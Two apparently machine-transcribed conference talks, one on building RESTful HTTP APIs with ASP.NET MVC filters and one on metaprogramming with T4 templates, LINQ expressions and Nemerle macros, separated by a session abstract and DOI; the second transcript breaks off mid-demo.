Until recently, Web API, if you've not heard about it, was under this umbrella of WCF. WCF is normally the acronym associated with, oh my God, XML. So they maybe thought it might be better to put it under some other product name, which is ASP.NET MVC, which has kind of a good reputation. Of course, that leads us to where Microsoft always leads us, which is, okay, now what? Which one should I choose? And the patterns described on the web are, oh, when you want an API, so a RESTful API, use Web API. And then for your user interface, use ASP.NET MVC. And if you came to my talk this morning, I kind of call that bullshit, right? Because my user interface is nothing more than one usage of my API. Why do I need to separate this out? To what benefit? Use either Web API or use ASP.NET MVC. Why should I separate it out? All you're doing by separating it out is adding more work for yourself. Because at some point, these two APIs are going to call the same kind of logic, same kind of business, same kind of pattern. At some point, you're going to duplicate work. To what end? So I'm not for that. You can use Web API. It has content negotiation. It has routing. It is more resource oriented. It embraces request response, which means that basically you've got a class with HTTP request, HTTP response. You can get access to that in MVC as well. With MVC, you have routing and you have a user interface. So with this guy, you don't have a view engine. But there is a project now which is called ASP.NET Contrib, sorry, Web API Contrib, which provides you a view engine. With this one, you don't have content negotiation. But hopefully now in the demos that come from now to the end of this talk, I will show you how easy it is to extend MVC to do RESTful systems without having to use Web API. Okay. And both offer extensibility. So you don't need the two heads. And definitely not the two controllers. Everyone here is familiar with ASP.NET MVC? Who's not? Okay, who is? Right. Just a quick recap. A request comes in. We have the concept of controllers, controllers call models, models, sorry, controllers call actions, actions call models, models give back data, whatever. That's the URL. Controller, class, action, action method. Right? There we have a problem. Actions are operations. They're not resources. Do you see the mismatch? If I put a customer controller there, I now have to define operations on that customer. In REST, you don't define operations on a customer. The operations are known. Right? It's PUT, GET. So this is operation oriented, versus REST, which is resource oriented. But we have these things called filters. And these filters, if you're not familiar with them, are going to be very useful. In MVC, they're one of the best extensibility points. You've got OnActionExecuting, OnActionExecuted, OnResultExecuting, OnResultExecuted. The first happens before an action is executed. The next one happens after an action is executed. OnResultExecuting happens before the result is returned. And OnResultExecuted happens after it's returned. And we can leverage this for a lot of things. I'll show you how. Verb routing. Let's switch over to code. Are you sick of PowerPoint? Are you sick of me? Oh, that's cruel. I'm losing my voice here because I feel that the microphone isn't loud enough. Is it loud enough? Well, you could tell me and I could lower my voice. I'm really, it's hurting here, people. So I'm just going to push the limit here. I have Visual Studio 2012 with an internal build of ReSharper. All hell can break loose. 
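Before the demo, here is a skeleton of those four filter hooks, as a hedged sketch rather than the talk's actual code; the attribute name and the trace calls are placeholders.

```csharp
using System.Diagnostics;
using System.Web.Mvc;

// Illustrative only: shows where the four MVC extensibility points fire.
public class TraceFilterAttribute : ActionFilterAttribute
{
    public override void OnActionExecuting(ActionExecutingContext filterContext)
    {
        Trace.WriteLine("before the action runs");        // e.g. authentication checks
    }

    public override void OnActionExecuted(ActionExecutedContext filterContext)
    {
        Trace.WriteLine("after the action has run");      // e.g. inspect or replace the result
    }

    public override void OnResultExecuting(ResultExecutingContext filterContext)
    {
        Trace.WriteLine("before the result is written");  // e.g. set response headers
    }

    public override void OnResultExecuted(ResultExecutedContext filterContext)
    {
        Trace.WriteLine("after the result was written");
    }
}

// Applied per action or controller, or to every action via global filters in MVC 3+:
// GlobalFilters.Filters.Add(new TraceFilterAttribute());
```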
My mom always says if you're going to fail, fail with style. So here is my code. Now, everybody understands the mismatch. No, I have customer controller where I normally define methods and I have resources. There's a mismatch. Okay, so how can I bridge this mismatch? Well, here is one example. And don't just have faith in me. You won't have to do this ever. Here's an example. What this does basically is says I have a customer controller and I have details. I have delete. I have update. I have create, et cetera. Right? And what I want to do is I don't want to have to call. When I want to do a delete of a customer, I don't want to say customer delete 25. Right? I don't want that. What I want to do is customer 25, but instead of a get, I want to do a delete. That's what I'm trying to do. Now, in MVC what you can do, and in fact, in the first preview, you had to actually do this and then they made it the action name to be convention based on the method name. You can define an action name. So here what I'm saying is that every single action is called the same, which is a rest action. And then each one has different verbs. So this one will only work with a get. This one will only work with a delete. Okay? What does this single action name provide me? Well, I create a root where I say rest roots, customer ID, and then all of them are mapped to action, rest action. So when the root processing comes in, it's always going to call rest action. When it goes to execute rest action, it says I've got five methods of rest action. Which one do I execute? MVC can discriminate based on the verb. And then we'll just do the appropriate one. Right? How many of you like the solution? I'm hoping nobody. That is not a solution I want to do. Right? I'll show you another solution, which also I hope nobody likes that much. In this case, I have index, details, delete, update, create. And you see that I've not decorated anything with any verb. Right? Now let's go to the routing table. And what I have here is customer create, customer details, customer delete, customer update, etc. So all of these are going to go to the different roots. But I do have a routing constraint over here. And what this does is basically it makes sure that the request comes in, is mapped to the method that I say is allowed. Okay? Who likes this approach? Why don't you like this approach? Pardon? Too much configuration. And the other approach is too much repeating yourself. Right? Good. We'll come back to another way of doing this later. But that is how you map resources to, that is how you map operations to resources with MVC. Okay? Content negotiation. A lot of times when I see people using, or creating HTTP or RESTful systems, I see a method which is customer controller, method details. And then I see another one which is customer controller and the method details JSON. Has anyone ever done that? So you have one method that gives you back a customer view and another one that gives you back a customer in JSON. That's horrible, right? It's also horrible to have an if inside a single method telling you which format to give back. So what do we do here? This is content negotiation. I do action result get, get the customer by ID and I do return view. And if I call that from a browser, it will return to me a customer HTML page. If I call that from Fiddler or a process, it will also give me back an HTML page. If in the, if in the call I say give me back customer25.json, it will give me back that in JSON. 
But that is transparent and it's not visible there. Right? So what do I do? I don't even have a filter. No, because in MVC 4 and 3, they introduce the concept of global filters. So basically every action can have a filter applied to it. And I have an output content type filter global to my application. What this does is, and this is a very hacky solution. Okay? Normally you wouldn't do it like this, but it's just for simplicity's sake. What this does is basically say you can request different formats, different representations for me based on the URL, based on the content type, etc. So it provides all three options, right? The content header. First it sees if the URL has any.extension equals JSON. Or based on the query string, customer query exclamation URL, sorry, format equals JSON. Or the accept headers. Okay? So it first sees if a request is being made, that request, that requires a special format. If it does, then it gets extensions and it passes it to encode data. What is encode data? All this does is encode the data based on the format I've requested. So here I'm just using a JavaScript serializer. If I want XML, I'll use a XML serializer. So all this is actually is nothing more than creating an action filter attribute and overriding the on action executed. When an action is executed, I can check for a specific type of view result, see if it has a model. If it has a model, I'll see if it's requested a special format. If it has, I'll encode it in that special format and send it back. I do it once and it applies to everything. Again, you wouldn't have to have to do this manually either. But it's very simple to do. It's leveraging the filters. So now I have content negotiation system wide with no effort, one filter. Another thing that I said you need in state and restful systems or in HTTP based systems is status codes. Out of the box ASP.NET MVC doesn't ship with status codes. And here's where with their web API, they make a big deal. Oh, you have access to the request and the response. Here is an example of me creating a customer. So I create a new customer, I save it to a repository. And again, there are some things that are hacky here like this generate route. It's done for simplicity. But I say generate the route and then I do new post result. So instead of doing a new view result or whatever, I do a post result. What is post? Well, post just inherits from action result and it sets the header for me. It sets the status code to 201. It sets the description and then it adds the header location, which if you remember, I told you is required when you create a new resource. It now sends back the location of the new resource. Point being you do this once and it's done. Right. And you've abstracted away from HTTP in your code, but it's still HTTP. And it's very simple to do. Okay. One of the things with rest is authentication. The problem with doing cookie based authentication is that the cookie has to live on the server. Normally, depending on how you handle it, there are ways around that. But by default forms authentication in ASP.NET MVC uses cookie authentication with the cookie on the server or stored in a server farm. That's against the constraints of rest. Right. You can't put state on the server in rest. Normally, you can use another type of authentication, which is called HTTP authentication. This is home controller. Right. This is admin controller. And you see that I have a new attribute called HTTP off. What is that? That just overrides again. 
It inherits from ActionFilterAttribute and overrides OnActionExecuting. And this is a simple implementation of HTTP authentication. Basically, with HTTP authentication, when you go to somewhere that's protected, it sends back a header saying authentication is required. Then the browser pops up the dialog box requesting a username and password. And what it does is send it to the server using base 64 encoding, where you have the username colon password. Very insecure. That's why with HTTP authentication, you have to either use digest authentication or SSL. But if I execute this, I'll show you. I can go to about us, home. If I go to admin, I get a dialog box popped up. ABC, ABC. And it goes to the server and brings the page back down. Right. So if I look at this, what I'm doing is in OnActionExecuting, which is the filter method that occurs right before an action is executed, I check to see if, sorry, where am I? Yeah, I check to see if an authentication header has been sent. If it has, then I parse it, get the username and password. And I just hook on to CAS, code access security, in .NET, using the same concept of GenericPrincipal and identity. That's it. That's the only thing I have to set. From there on, I can use it all just like you do with forms authentication. It's very simple. Okay. One other thing which is important for HTTP is caching. And this is actually very important. And I think that they don't have support for this even in Web API. But again, the point is to show you the simplicity. OutputCache, you know that exists in ASP.NET MVC. So you can cache a specific resource. But there's another cache mechanism in HTTP, which is called conditional GET. So conditional GET basically says, do a GET, give me back the resource. Right. But if the resource is big and it hasn't changed, I don't want you to send it back. So what you can do is create a hash of that resource and send back a header that says, this is the resource hash. The client can say, oh, it hasn't changed. So I won't request it. If it has, send it back to me. And that's using the concept of modified headers and ETags. So here what I'm doing is saying, get me a customer, and if the customer hasn't changed, then don't give it back to me. If it has, then give it back. Right. And I've put on a new attribute that I've created which is called ConditionalCache. And if we click on this, again using OnActionExecuted, what I do is I get the model, because I'm assuming that it's a ViewResult and has a model. Obviously the error checking would need to go in here. And I say, okay, generate the ETag for the model. So this is just taking the model, serializing it and generating a hash. You can base that on whatever you want. Then I check to see if an incoming ETag has been sent, which is set in If-None-Match. So basically what the client request is doing, what the browser is doing, is saying, If-None-Match this value. So if it doesn't match this value, send it back to me. I see if that value has been sent. If it has, I compare the ETag with the incoming tag. If it's the same, then I send back an HTTP status code result saying 304 not modified. If it is different or if it is blank, because it's never been sent, I then add a header called ETag. Done, conditional GET implemented with a simple filter. But when you look at RESTful systems and you look at conditional GETs, which are very good for scalability, you might get scared and say, oh, ASP.NET MVC doesn't support this. Done in four lines of code. Right. 
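A rough sketch of how such a conditional GET filter can look; the attribute name and the fingerprinting choice here are illustrative, not the exact demo code.

```csharp
using System.Net;
using System.Web.Mvc;

public class ConditionalCacheAttribute : ActionFilterAttribute
{
    public override void OnActionExecuted(ActionExecutedContext filterContext)
    {
        var view = filterContext.Result as ViewResult;
        var model = view == null ? null : view.ViewData.Model;
        if (model == null)
            return;

        // Any stable fingerprint of the model will do; serialize-and-hash is one option.
        var etag = "\"" + model.GetHashCode().ToString("x") + "\"";

        var incoming = filterContext.HttpContext.Request.Headers["If-None-Match"];
        if (incoming == etag)
        {
            // Nothing changed: short-circuit with 304 and skip re-sending the body.
            filterContext.Result = new HttpStatusCodeResult((int)HttpStatusCode.NotModified, "Not Modified");
            return;
        }

        filterContext.HttpContext.Response.AddHeader("ETag", etag);
    }
}
```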
In vNext, you can just drag and drop it. Oh, God, you guys are so asleep, aren't you? I've mentally taken a picture of every single person that's fallen asleep. So one thing I want to mention, much of what I've shown you, and this isn't a personal plug, okay. Much of what I have shown you is available in a project on GitHub called EasyMVC, which I haven't touched for two years. That's why I'm not trying to plug my own project, okay. But all the content negotiation, all the routing, all that is done. In fact, with EasyMVC, all you need to do is create a new project and follow some conventions. Remember how I did the mapping with the verbs? With EasyMVC, you don't need to do that anymore. Okay, let me just show you a quick example. And this, again, is about showing you the simplicity. So let's go to projects, EasyMVC. So this is an example using EasyMVC. This is a sample app. If you look at my controller, customer controller, this one has gets, etc. Employee controller has list and details, okay. And my MVC application also has no routing. All it does, it says, this is from EasyMVC, it says route generator, generate routes from assembly. And this uses some default conventions that say map action list to verb GET on the route of the controller. Map action delete to PUT, sorry, to DELETE on the controller route with an ID. So basically it's using convention, and as long as you stick to those conventions, you don't have to define any verbs or anything. And much the same with content negotiation, it automatically injects it in. Okay, again, the point is the simplicity, not for you to use this. Wait a minute, let me see where I am. We're summing up, don't worry. Okay. Just quickly, client side, oh, hypermedia controls, neither REST, nor Web API, nor MVC provide anything in hypermedia controls. So Atom and all that, you've got to do yourself, with either technology you use. Client side, when talking to this, you can use Ajax if you're in a browser. Outside of a browser, to implement the client side interaction with a RESTful service, you can use any HTTP library, be it WebRequest, be it EasyHttp, be it RestSharp, anything you want you can use. Okay. When you're doing it from a web browser, there is no DELETE verb in a form, but you can work around that. You have to simulate it, and you can do that with a hidden field or use an extra header, which is X-HTTP-Method-Override, and say that this is an actual DELETE. That's one shortcoming when using it from the browser. Okay. So REST is a series of constraints. If you follow these constraints, you gain a series of advantages. If you don't follow them, you won't gain those benefits. If you only go up to level two, you won't get the benefits of REST. You'll just have an HTTP API. Call it for what it is. It's fine. There are no issues with having an HTTP API, but REST does give you a lot more. It gives you flexibility to evolve your system without having to update contracts. And personally, I say embrace HTTP for what it is. You want to use one technology, use it. You want to use the other, use it. But this concept of, oh, I'm going to separate out my API controller from my user interface, for me is absolute nonsense. Okay. Recommended reading. RESTful Web Services, by Leonard Richardson. Highly recommended. And not a very convenient name, but it's RIP, REST in Practice, by Jim Webber and Ian Robinson. Very good. This comes with Java and C sharp examples of how to do things like the hypermedia, links, forms, et cetera. 
This is a more gentle introduction, but it's a very good introduction. If you look up HATEOAS in this book, he doesn't refer to it as HATEOAS. He refers to it as connectedness. Okay. But it does still cover hypermedia in depth. Okay. So if you don't have any questions, thank you once again for being here and enjoy the rest of the show.
|
Creating ReST architectures with ASP.NET MVC is more than just decorating actions with verbs. It’s about leveraging HTTP as an application protocol to its full potential. In doing so, we can create robust and scalable applications, not only from a performance point of view but also in terms of change and maintainability. ASP.NET MVC offers us great potential to create ReST architectures that can be consumed by computers and humans alike, reducing the amount of effort involved. Now combined with the WCF Web API which is focused exclusively around ReSTful constraint, MVC offers us even more possibilities. Come to this session to learn what ReST is really about and how we can create simple yet powerful systems with the Microsoft MVC stack.
|
10.5446/50970 (DOI)
|
Can you hear me okay? Hello everyone, my name is Igor Tkachev. This is our second Nemerle session. Last time we discussed the functional programming features of the language. Today we are going to look at the other side of the language. Some people say that this is the dark side, the dark side of the programming force. It's dark because metaprogramming macros and the ability to extend our compilers are dangerous things. Okay, it's too big a gun for developers, because we can shoot ourselves and we can shoot everybody around us. Today I'm going to show this gun and we're going to look at a few metaprogramming tools and metaprogramming techniques that are available for C sharp developers. Then we will create a few macros. We will extend the Nemerle compiler and we will extend the Nemerle language itself. By the end of the presentation, I believe that you will be able to decide if you should be scared of the size of this gun, or whether it fits you and you can use it and get benefits from using it. Let's start. The definition of metaprogramming is very simple. In a few words, metaprogramming is the writing of metaprograms. A metaprogram is a computer program that creates or manipulates other programs. If you have an application that generates source code and you compile this code later, or your application generates executable code at runtime, then your program is a metaprogram. I prefer to group metaprogramming tools by the time when they generate or manipulate the code. We can have tools that generate code at pre-compile time, post-compile time, runtime, or right at compilation time. The first example of a pre-compile time code generation tool is Visual Studio custom tools. If you have ever used the Visual Studio database designer or the Visual Studio dataset designer, you should know that they generate some source code. They use a Visual Studio custom tool for that. One of these tools is the T4 template generator. Now we are going to look at this thing. What is this? We can create a T4 template in just the regular way. New item, general, text template. I just generate a T4 template and now I can put any garbage here. If we save it, we can see that now we have this garbage in our text file. Let's change it. We are going to generate source code. Let's change the extension. It's a good idea to use the generated.cs extension because some tools like, for example, ReSharper can process these files differently. Now instead of this garbage, I'm going to put in another one. We are going to have just one field. Now if we save this file, we can see that we generate C sharp code, and inside this code we can find our class. Of course, this is useless. Let's create some template that we can reuse to generate many classes like this. I already have it in my clipboard. All I need to do is to define a function, and you can see that inside this function I have the template I wrote just before. Now if we save this file, we can... Okay, we didn't even call it. Let's call it first. Generate class. So now we can see this class. Now we can reuse it. We can generate as many classes as we need. Here we go. This is of course not a realistic example. I have another template, another demo that generates a model, a view model for my application. By the way, I didn't mention it, but we can remove this code and put it in a separate file and call it like... Give it an extension like TT. Include it, and then we can reuse this file from different templates. 
I already have some templates that implement some logic like creating classes, properties, methods. I have another template that contains the logic to generate the INotifyPropertyChanged interface. Now all I need to do is to create a new class. I give a name to this class, like view model, and then I can add as many properties as I need. Let's look at what we just generated. This template generates this file. We can see that we have the INotifyPropertyChanged interface. We have fields, we have support for this interface, and properties that have a field and all the logic we need to implement and support INotifyPropertyChanged. For example, I have another template, editable object. Now if I change the type of my property, for example, to editable, we will see a completely different picture in the generated file. Now we have another interface, and for example, for this property, we have two fields to support original and current values. This is metaprogramming, this is a T4 template, and in this case we provide the information used by this template right inside the template. If we look at the size of the generated file, for example, right here, we have 15 lines of code and we generated almost 200 lines of code. This template uses information I provide right inside the template, but we can also read information from different sources that are available before compilation time. For example, this template generates database classes. It reads the database schema from my database, from my machine, and it generates some classes for the Northwind database. We have lots of classes, we have classes for views, for tables, identities, primary keys, all the information we need to work with our database. This is T4 templates. Pre-compile time code generation, we can use it if we have information before compilation time. Next item, PostSharp, post-compile time code generation. I don't have PostSharp installed on my machine, so I will explain just how it works in a few words. In the project settings, the project properties, we have this build events tab and we can put any tool in the post-build event step, and on a successful build, for example, we can run this tool. PostSharp works in this way. You can use PostSharp attributes to decorate your classes, methods, even attributes. On a successful build, PostSharp can read your assemblies and modify something inside these assemblies, and maybe generate new assemblies and add some additional logic to your application. This is post-compile time code generation. Runtime code generation. We can generate executable code when we run our application. We have actually two technologies to do that. System.Reflection.Emit. I'm going to show you. We're just not going to write any code, because it's crazy. This is a very simple example, but we have a lot of code. This code implements this interface. It generates a new class and implements this method and puts this logic inside this method. We need to programmatically create a new assembly, a dynamic assembly, a new module, a type, and everything else. Then we can generate MSIL, Microsoft Intermediate Language. These three lines generate just one line like this, and these two lines generate the call of this method. It's a very low-level technology. It can be used, for example, to increase the performance of our applications. Sometimes we use it. The next technology is System.Linq.Expressions. Let's play with this, and we'll need it later. I'm going to define a lambda. 
Func of int, int, and just a function. Our lambda is going to have just one parameter and we will multiply it by two. Now we can call it, get the result, and print it. Now if we run it, we can see that it's four. Yeah, usually two times two is four. Now I'm going to modify this code. First of all, I duplicate it, and then I will make one change. I just rename my variables, and now I'm going to change one little thing. I'm going to change the type of our variable to Expression. You see, this line is okay. I define the same lambda. But now I cannot call it, because in this case the compiler doesn't generate executable code. It generates a data structure that represents this code. It generates LINQ expressions. And to run it, I have to compile this data structure first. Compiled function two, and I have to call Compile. So now it's going to work. Now we can run this and we can see that this is four and four. So again, in this line, I defined a lambda and the compiler generated executable code. We can run it, we can get the result and print it. In this line, I define the same lambda, but the compiler doesn't generate executable code. It generates a data structure that represents this code, that describes this code. I have to compile it and then I can call it. So actually the compiler does some magic, but we are big boys and girls, right? So we don't believe in magic, Santa Claus doesn't exist, and we know that we can write the same code manually and we can create this data structure ourselves. So let's do it. Now I'm going to duplicate it again. And again, I change my variables. Now I'm going to change this line. Instead of a lambda, I'm going to generate the same data structure manually. Okay, I'm going to use the static methods of the Expression class. This is Lambda. I need these generic parameters. And now I have to provide the body of my lambda. The body of my lambda is the parameter multiplied by two. So now let's generate it. Let's create this. Again, Expression.Multiply. And now I have to provide the left and right parts. The left part is the parameter. It's this one. Okay, so let's create it. Again, Expression.Parameter. And I need the type of this parameter, this is an integer, and the name is X. Okay, so now we can use it, X. The second, the right side, is a constant, but I cannot use just an integer because it requires an expression again. So I need to create the representation of this constant. Okay, Expression.Constant. Okay, so we just created the body of this lambda. Now I have to provide the parameter. Okay, the next parameter is our parameter. Actually we're done. If I execute it, we see four, four, six. Yes, it's six because I used the best technology ever, copy paste, powered by find and replace. So now it's okay. Again, what's going on here? In this line, we define a lambda and the compiler generates executable code. We can run it and get the result and print it. In this line, the compiler does some magic. It doesn't create executable code. It generates a data structure. Here we generate the same data structure manually. Okay? So this is LINQ expressions. This is runtime code generation, and this is metaprogramming as well. Next item, compile time code generation. If you have a C++ background, or if you're familiar with C++, then probably you know that there is a kind of strange technology, templates plus macros. You can use it. It's very difficult to understand. It's very difficult to create something that can be useful, and the result, unfortunately, is very primitive. 
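For reference, the three variants walked through in that runtime-generation demo look roughly like this in C# (in the talk the third one printed 6 because of a copy-paste slip; here the constant stays 2):

```csharp
using System;
using System.Linq.Expressions;

class ExpressionDemo
{
    static void Main()
    {
        // 1. A plain lambda: the compiler emits executable code.
        Func<int, int> f1 = x => x * 2;
        Console.WriteLine(f1(2)); // 4

        // 2. The same lambda typed as an expression: the compiler emits a data
        //    structure describing the code, which must be compiled before calling.
        Expression<Func<int, int>> e2 = x => x * 2;
        var f2 = e2.Compile();
        Console.WriteLine(f2(2)); // 4

        // 3. The same data structure built by hand with the Expression factory methods.
        var x = Expression.Parameter(typeof(int), "x");
        var body = Expression.Multiply(x, Expression.Constant(2));
        var e3 = Expression.Lambda<Func<int, int>>(body, x);
        Console.WriteLine(e3.Compile()(2)); // 4
    }
}
```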
But anyway, we can use this technology to generate code at compile time. Unfortunately it uses what are probably side effects of the compiler, but still we can generate something. Nemerle macros and C++ macros are completely different things. They only have the name in common, but they are totally different things. Nemerle is one of the very few languages that have been designed to support metaprogramming from the beginning. So metaprogramming is a native thing in the language. We can say that Nemerle has a pluggable compiler and macros are plugins to the compiler. The compilation process is a kind of complicated thing and it has a few steps, like parsing, typing, semantic analysis, code generation. But the very first thing the compiler does is create a data structure that represents the compiled source code, which is the same thing we saw here. And when the compiler generates this data structure, we can manipulate it. We can modify it. We can analyze it. We can add new nodes to this structure. We can remove something if we need. And from the developer's point of view, a macro is just a function. This function is called by the compiler, it has access to the compiler API, and it can change, modify or transform this data structure. We call this data structure an abstract syntax tree, okay, an AST. So macros actually manipulate this abstract syntax tree. So now we're going to create a macro, a Nemerle macro, and see how it works and what we can do with that. I have already a demonstration project. We are going to test our macros in this project. And another project is a macro library. We have to have two projects. As the macro is a plugin, it has to be compiled before we can use it. So we will create macros in this macro library. And the first macro is going to be our database generator. So what we saw right here. So we are going to implement similar logic, simpler, but similar. So let's create it. We have a macro wizard and the macro name is going to be DbImport, right? Okay. We have two types of macros. Macro attribute and expression level macro. In this case, we are going to use a macro attribute. Also we have a few phases, like before typed members, so it's related to typing, and we are going to leave this as it is. Also we are going to create an assembly level macro. Our macro is going to have just one parameter, database name, of the string type. Okay, so the wizard generated this template and now we can modify it and implement this macro. Actually we can implement our macro right here, but we have created an additional module for implementing this macro. So we are going to use it. Okay, the first thing we are going to do is to read information from our database. So this is a macro, it will be compiled, it will be called by the compiler at compile time. And at this time we are going to read information from our database. So we are going to do it right here. I created a helper with a GetSchema method, so we are not going to waste our time on that. Let's use this method. Okay, let's look at what it does. This method is defined right inside this library, so actually a macro library can contain any code. Code like this, for example, helpers, whatever, macros, everything. In this method we just create a connection, open the connection, then read the schema from our database, read columns, tables, and then we even map some database types to .NET types. And then we return this data structure. 
We return a list of tuples, and in every tuple the first field is the table name and the second field is the list of fields, and every field has a name and a type. Okay, so very simple. I didn't create a structure for that, so I can use tuples to return this simple structure. Okay, so let's store it somewhere. Next step, we need a namespace for all our tables. We don't want to put them just in the global namespace. We want to create a namespace, and the name of this namespace is going to be the database name. So let's create a namespace inside of this macro, inside of, well, it's going to be inside the compiler when the compiler compiles our application. So now we need to use the compiler API, and we have this typer parameter. This is the entry point to the compiler API, and we need the manager class, and on this manager class we need the CoreEnv property. This property has the method we need, EnterIntoNamespace. This method can be used to get an existing namespace or create a new one if it doesn't exist. It takes as a parameter a list of strings. Why a list? This namespace has two parts, so we need to provide a list of strings. But we are going to create just a namespace with the name of our database. But of course we can put something else, for example, let's say, tables. So we are going to have the database name and then tables, okay. Let's do it in this way. It returns a GlobalEnv object, so let's keep it, we are going to need it. And okay, and now we are going to iterate through our database schema and define new classes for each table. The type of this item is, you remember, the table name and a list of fields. So this is a tuple. I am going to decompose this tuple right here. So I already have fields for every field in our tuple, and now I am going to define a table. We have the environment and we have the Define method. If we look at the parameter, this is part of the abstract syntax tree of the compiler. And what I can do, I can create this class manually, a type declaration and so on, but I am not going to do this. If I start doing this, we are going to spend the whole day and probably the weekend, so I am going to use another technique. You remember that in this code right here, I provided C sharp code, but the compiler generated a data structure. We have a very similar technique in Nemerle. We call it quasi-quotation. We use these brackets, and now inside these brackets I can write Nemerle code, and the Nemerle compiler will create not executable code, but a data structure, an AST, a syntax tree. C sharp can create only expressions like this, but here we need a type declaration. We are going to write code to declare a class, right? But we use the same quasi-quotation, the same syntax, for expressions, for defining classes, for everything. And if I need to define a class, I have to use these prefixes, these modifiers, so now the compiler knows that I am going to define a new class. And now I can put just regular Nemerle code, public class. And now one more thing, I need this name to be the class name, okay? So I need to put this variable somehow in my code inside these brackets. We use this quotation syntax to do that. And I have to use the usesite modifier, I will explain later what this is. Okay, so actually I just created a new class inside the compiler, and it returns a TypeBuilder. So now I need to do one more thing. I have to call the Compile method. So now we are done, actually. 
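To make the outcome concrete, here is roughly what the DbImport macro ends up producing for one table, expressed in C# terms. This is only a sketch: the real output is generated as Nemerle declarations inside the compiler, the table and column names depend on the Northwind schema, and the column properties are only added in the next step of the walkthrough.

```csharp
// Illustrative equivalent of the generated code, not the macro's literal output.
namespace Northwind.Tables
{
    public partial class Customers
    {
        // One property per column gets added in the next step, e.g.:
        public string CustomerID  { get; set; }
        public string CompanyName { get; set; }
        // ...
    }
}
```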
This code will define new class and in this loop we will create one class for each table in our database. But we don't have fields yet, right? So now we need to put some properties for every field in our table. So now let's create properties. Field is a list of tuples. So I have name of the field and type. Now I need to transform it somehow into the abstract syntax tree. I can use select method, for example, like this, system.link.expr, enumerable select. But in Emulator we have map and the difference is that map returns lists and I need a list actually. So I'm going to use lists but it's actually the same function. And of course I'm going to use quasi-quotation again. The type of this field is strings, okay, name and type. So I'm going to decompose this tuple again, name, type. So now I can use them again, declaration. I'm going to generate something like, for example, public, customer, ID, string, get, set. Okay, something like that. But instead of this name I'm going to use this variable. And again, I'm going to use quotation, name, use, site. And instead of string I'm going to use type variable. Type, use, site. So now it should be okay but we need to store it somewhere. Members. And now we can insert it in our class. If we have just one variable we use this syntax for quotation. If we have list we use another syntax, we use this one. So it means that I insert the whole list, okay. And now if we compile it it should be okay and we can test it. Okay, it works. So now let's go to our application, test application. First thing I have to do, I have to compile my macro library. I have to do it. Then I have to open the namespace where I define my macro. I have to use macro library and now I can use my attribute. Assembly, this is assembly level attribute. DB import. And we have to provide the name of the database northwind. Okay, I think it's okay and now we can create an instance of some table. We have northwind namespace and I added the additional part of the namespace tables and now we have all the tables in this namespace. So we can create an instance and we will let's print this variable. Okay, so as you can see we have all the tables. There is only one problem. CLR allows to create the classes with the space inside the name but we will not be able to use it from C sharp from Nimirlia. So let's fix this problem. Let's replace all the spaces with underscore, for example. Replace underscore. Now if we, let's compile it again. Now we see that the name changed and now we can use it. Okay, let's run the application and we see that we printed the name of the type. Maybe it's a good idea to print something more detailed, more descriptive. And to do that we would have you write the two string method of this class, right, but how can we do it? We can do it in this way. We can define, we can say that our public class is partial and right inside of our macro and now we can define another part of this class. Tables and this is partial class customer. Okay. And now we can override the two string method. We are ready to implement. So and in this method we can implement, we can return some value. For example, we will print, we will return some like customer ID is and let's say, let's add a value, customer ID. Okay, so now if we print it, oops, we have an error. Partial class here, let's compile it. Okay, now we can see that we override two string method and now we print some more descriptive information. So let's put something in this property. Okay. Also, we can print more fields. 
In this case, we can use string.Join with a new line as the separator. Now we need an array, and then we will print another field. This is the company name. Okay. And if we run it, it's going to print something. Okay, but we have a metaprogramming tool. So let's have the compiler generate all these things for us. Okay, so let's define another macro. And this macro will override the ToString method for any class where we apply it. It's going to be a macro attribute as well. And the name is going to be the ImplementsToString macro attribute. But now we need another phase, with typed members, because we need all these members. And we are going to use this attribute on the type. We don't need parameters, so let's create it. Okay. The first thing we have to do is to override the ToString method. We have a TypeBuilder here. In our previous macro, we created this TypeBuilder, as you remember. We created it. Now the compiler provides us with this information, with this TypeBuilder. And now we can use TypeBuilder.Define, we define a new method. And of course, we're going to use quasi-quotation here. And here we'll put override, we override our ToString method. And inside this method, we're going to put exactly the same logic. Okay. But instead of these fields, we need to generate expressions for every property of our class. So let's do it. I'm going to use the TypeBuilder again, because we can call the GetProperties method. So actually, we are using the compiler API. And we have all the properties. And now we need to generate expressions like this, okay, to print our properties. So we will transform our properties into abstract syntax tree expressions. Map again. We have a property. And here we have another quasi-quotation block. But now I don't have to specify the decl modifier, because we're going to generate an expression. This is the default mode for this quasi-quotation block. Okay. I need to generate this code. So instead of this name, I'm going to use pname. No, I'm going to use quotation again: pname plus this string. And now I'm going to use pname again, but with usesite. So in the first case, the compiler uses only the string, only the name of the property. In the second case, the compiler inserts a reference to this property into our syntax tree. So now we can use it right here. And again, since this is a list, we have to use this syntax. Now let's decorate our class with this attribute. ImplementsToString. Okay. Oh, yeah. Redefinition, of course. Because I didn't delete this. Okay. Now we have all the properties, and one more thing. We can define this attribute in our DbImport macro right here. So macros are recursive. We can use one macro from another one. And let's compile it again. And execute, and we see that it works. Okay. Actually, we don't even need this class here. Okay. These are macros that are implemented as attributes. Now we're going to play with a macro that introduces new syntax into the language. Actually, we're going to extend the language itself. As an example, we'll take two sequences, two arrays, and we'll create a foreach, something like a foreach statement. But this foreach statement will iterate through two lists at the same time, right? So just as an example. Let's say we have samples. Okay. No, I don't have it. Okay. Anyway. I need to define two arrays. An array, like one, two, three. Another array. So first of all, I'm going to write the program I want to generate. Then I will put this code in my macro. 
So first of all, I'm going to write the application without the macro. And now I'm going to write the code I want to generate. So this is, it's going to be, iter1 equals the first array's GetEnumerator. Then I need the enumerator for the other array. And now I'm going to use a while loop to iterate, using iter1, through these arrays. And now I'm going to get the current, come on, current values. And then I can do something with these values. For example, we can print them. WriteLine, and x, x, y, y. Okay. So I need something like that. But instead of doing all these things, I want to automate it and create a new keyword, and create a macro to implement all this logic. Okay, so let's copy it. And now let's create a new macro. Let's call it foreach2. This time it's going to be an expression level macro. And we will define syntax. We need two parameters, an expression, and the type of this parameter is going to be expression, and a body. And body. Okay. So we see now we have a syntax section and now we can define our syntax. Let's say foreach. Then we're going to have a round bracket and we will close this bracket. That's it. This is our syntax. But now we need to implement the transformation of our expression. A syntax level macro takes as a parameter one or more expressions, transforms them, and returns another expression. Again I'm going to use a quasi-quotation block. And I put all the code I want to generate right inside this block. Okay. Instead of this body, I'm going to use the body that will be provided by the compiler when this macro is called. So I use this expression. A little bit later we're going to work on this expression. Now let's see what we want from this macro. How we want this syntax to look. X, Y, for example, we will use tuple syntax here. Then we need the in keyword and then our arrays. And after that we will have the body of this loop. So we need something like that. But we need to check that the format of this part of our macro is this one. So we need to check it somehow. And now we are going to 